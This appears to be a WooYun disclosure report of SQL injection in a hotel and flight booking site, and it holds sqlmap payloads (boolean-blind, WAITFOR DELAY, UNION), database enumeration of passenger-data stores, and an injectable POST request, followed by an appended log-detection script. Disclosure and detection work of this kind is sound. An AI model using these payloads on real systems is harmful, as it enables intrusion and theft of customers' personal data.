WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2016-04-19: Details sent to the vendor, awaiting vendor handling
2016-04-22: Vendor has confirmed; details disclosed to the vendor only
2016-05-02: Details disclosed to core white hats and experts in the relevant field
2016-05-12: Details disclosed to regular white hats
2016-05-22: Details disclosed to intern white hats
2016-06-06: Details disclosed to the public
As the title says.
Injection 1:
http://**.**.**.**:80/flight/view_xz.aspx?id=9
Injected parameter: id
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y
sqlmap identified the following injection point(s) with a total of 54 HTTP(s) request
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=9 AND 2970=2970

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=9;WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 1 column
    Payload: id=-4355 UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(107)+CHAR(107)+CHAR(1
---
[15:09:21] [INFO] testing Microsoft SQL Server
[15:09:21] [INFO] confirming Microsoft SQL Server
[15:09:22] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:09:22] [INFO] testing if current user is DBA
current user is DBA: False
[15:09:22] [INFO] fetching database names
[15:09:22] [INFO] the SQL query used returns 12 entries
[15:09:22] [INFO] retrieved: AgentDB
[15:09:22] [INFO] retrieved: cmymall
[15:09:23] [INFO] retrieved: cyymall
[15:09:23] [INFO] retrieved: EMall
[15:09:23] [INFO] retrieved: ggtvisa_pek
[15:09:23] [INFO] retrieved: haihua_pek
[15:09:23] [INFO] retrieved: master
[15:09:23] [INFO] retrieved: model
[15:09:23] [INFO] retrieved: msdb
[15:09:23] [INFO] retrieved: phmall
[15:09:23] [INFO] retrieved: tempdb
[15:09:23] [INFO] retrieved: xhmall
available databases [12]:
[*] AgentDB
[*] cmymall
[*] cyymall
[*] EMall
[*] ggtvisa_pek
[*] haihua_pek
[*] master
[*] model
[*] msdb
[*] phmall
[*] tempdb
[*] xhmall
Databases:
They hold sensitive passenger data: hotel booking records, flights, names, transaction serial numbers and so on.
The data volume is large.
Injection 2:
POST /hotel/searchlist.aspx HTTP/1.1
Content-Length: 4430
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://**.**.**.**:80/
Cookie: ASP.NET_SessionId=o0xqncikkbxpowepywua33q1
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

CheckInDate=01/01/1967&CheckOutDate=01/01/1967&CityCode=1&CityName=%e5%8c%97%e4%ba%ac&CityRegion=&hfMaxPrice=0&hfMinPrice=0&hfRank=&hfRoomNum=1&hotelid=&icityregion=San%20Francisco&PorName=&roomid=&txtHotelName=fqwnbsni&__EVENTVALIDATION=/wEdAA37b0eO4dRB4UUqB/4w4/pdZHMbe731eFAxuGvO9ZZ5ZZjeo/fMeTXf/QQiPkaixvAL0yspPcNhOVjUIIFayqSOvSPZXSSPF9R2TFrtv5QdaRUeYxuAVINbp58%2bLmZvWWe4Ltm82CeaLS2kIluHCSoRpwz8DLYyF0vx1oqMiiCqXQpWuJlIup7RXShjdkEB6dhdsH75TQ9b%2bD%2b5XWA7Ji/lhBYXRHobukEUNnQb5b%2bL6lvgu/%2bD2STGYjNLjccYZQgKTJ1RHDZtslr6RMNzYdMlyCH0X0ihRti4ONCc7CULX/hkWojwc%2bXeev%2bqP/umvpM%3d&__VIEWSTATE=[multi-line base64 ViewState blob omitted]&__VIEWSTATEGENERATOR=41450651
Injected parameter: CityCode
Injection result:
Too slow, I didn't dump it; the data volume is still fairly large.
You know what I mean.
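As an added example that is not part of the original report, the Python script below shows how a defender could spot the three payload shapes sqlmap reported for the `id` parameter (boolean-based `AND n=n`, stacked `WAITFOR DELAY`, and `UNION ALL SELECT CHAR(...)`) in IIS W3C access logs; the log lines, client addresses and user agents are constructed for illustration. The same patterns apply to the CityCode POST parameter, but IIS access logs do not record POST bodies, so that case needs application-level or WAF request logging.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not from the report). The query strings reuse
# the payload shapes sqlmap reported for the `id` parameter. Field order:
# date time cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
SAMPLE_LOG = """\
2016-04-19 15:09:20 GET /flight/view_xz.aspx id=9 80 - 203.0.113.5 sqlmap/1.0 200
2016-04-19 15:09:21 GET /flight/view_xz.aspx id=9+AND+2970%3D2970 80 - 203.0.113.5 sqlmap/1.0 200
2016-04-19 15:09:21 GET /flight/view_xz.aspx id=9%3BWAITFOR+DELAY+%270%3A0%3A5%27-- 80 - 203.0.113.5 sqlmap/1.0 200
2016-04-19 15:09:22 GET /flight/view_xz.aspx id=-4355+UNION+ALL+SELECT+CHAR(113)%2BCHAR(118)-- 80 - 203.0.113.5 sqlmap/1.0 200
2016-04-19 15:10:02 GET /flight/view_xz.aspx id=12 80 - 198.51.100.7 Mozilla/5.0 200
"""

# Detection rules, applied to the URL-decoded query string (so %27, %3B, + are normalised first).
RULES = {
    "boolean_blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),
    "stacked_timing": re.compile(r";\s*WAITFOR\s+DELAY\s+'[\d:]+'", re.I),
    "union_char": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b.*\bCHAR\(\d+\)", re.I | re.S),
}


def classify_query(raw_query):
    """Decode one cs-uri-query value and return the names of the rules it matches."""
    decoded = unquote_plus(raw_query)
    return [name for name, rx in RULES.items() if rx.search(decoded)]


def scan_iis_log(text):
    """Return one dict per request whose query string matches at least one rule."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if not line or line.startswith("#") or len(fields) < 10:
            continue  # skip blank lines, W3C directive lines and malformed rows
        date, time, _method, path, query, _port, _user, ip, _agent, status = fields[:10]
        rules = classify_query(query)
        if rules:
            hits.append({"time": f"{date} {time}", "path": path, "ip": ip,
                         "status": status, "rules": rules})
    return hits


def count_by_ip(hits):
    """Aggregate hits per client address; a scanner's many probes cluster on one source."""
    return dict(Counter(h["ip"] for h in hits))
```

Running `scan_iis_log(SAMPLE_LOG)` flags three of the five constructed requests, all from the same source; plain `id=9` and `id=12` are left alone.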
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2016-04-22 15:28
CNVD could not reproduce the described situation; CNVD has notified the site operator by email through its publicly listed contact channel, and the operator will provide a fix.
None yet.